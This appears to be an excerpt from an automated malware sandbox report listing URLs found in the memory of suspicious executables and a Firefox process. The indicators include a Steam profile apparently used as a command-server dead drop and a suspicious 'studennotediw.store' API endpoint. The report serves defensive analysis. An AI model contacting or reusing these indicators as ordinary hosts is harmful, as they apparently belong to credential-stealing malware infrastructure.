Source: file.exe, 00000000.00000003.2208378374.000000000061E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199555514.000000000061E000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.0000000001096000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001172000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001168000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001168000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001172000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000003.2199555514.0000000000631000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/7656119972433190066
Source: file.exe, 00000000.00000003.2208378374.000000000061E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199555514.000000000061E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900S
Source: ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001168000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001168000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900d
Source: ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: ee8d47a049.exe, 0000000C.00000003.2884028726.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001155000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001155000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900D
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowe
Source: ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2199665798.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199555514.000000000064D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993784315.0000000001102000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967613756.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883971948.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034649856.0000000001177000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: file.exe, 00000000.00000003.2199665798.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199555514.000000000064D000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993784315.0000000001102000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967613756.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883971948.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034649856.0000000001177000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba2
Source: ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993653031.0000000001110000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2975067077.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034649856.000000000114A000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3035132023.000000000114F000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, file.exe, 00000000.00000003.2267291789.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2291920296.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2367688328.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2267704300.000000000069E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2279787615.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284921931.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2310713522.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993653031.0000000001110000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2975067077.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993653031.0000000001110000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2975067077.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, file.exe, 00000000.00000003.2267291789.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2267704300.000000000069E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993653031.0000000001110000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2975067077.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001155000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001155000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api=
Source: firefox.exe, 0000001C.00000002.3201171185.000002681E103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: ee8d47a049.exe, 0000000C.00000003.2926303044.0000000005917000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helphttps://support.mozi
Source: firefox.exe, 0000001C.00000002.3238655624.000002682F48B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001C.00000002.3265464725.0000026831898000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshttps://support.mozilla.org
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationAttempting
Source: ee8d47a049.exe, 0000000C.00000003.2926303044.0000000005917000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001C.00000002.3201171185.000002681E103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.comtestPermissionFromPrincipalupgradeTabsProgressListenermigrateXULAttrib
Source: firefox.exe, 0000001C.00000002.3290440543.00003793D3B04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A824000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001C.00000002.3226223465.000002682E05D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000003.2249981893.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2926652624.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001C.00000002.3289304414.000015D2F1003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/Z
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A824000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3083238118.000002682E000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3085509496.000002682E210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: ee8d47a049.exe, 0000000C.00000003.2883437222.0000000001080000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.co
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208378374.000000000064D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208508823.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208350186.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.0000000001080000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993784315.0000000001102000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967613756.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883971948.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883971948.00000000010D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: file.exe, 00000000.00000003.2208378374.000000000064D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208508823.000000000064F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/a
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208350186.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883971948.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: file.exe, 00000000.00000003.2222905597.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2223063752.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222836182.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899443498.0000000005841000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898618121.0000000005844000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898704661.0000000005841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 0000001C.00000002.3226223465.000002682E05D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001C.00000003.3086576569.000002682E253000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3222736254.000002682D870000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.3083238118.000002682E000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3085509496.000002682E210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2222905597.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2223063752.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222836182.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899443498.0000000005841000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898618121.0000000005844000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898704661.0000000005841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
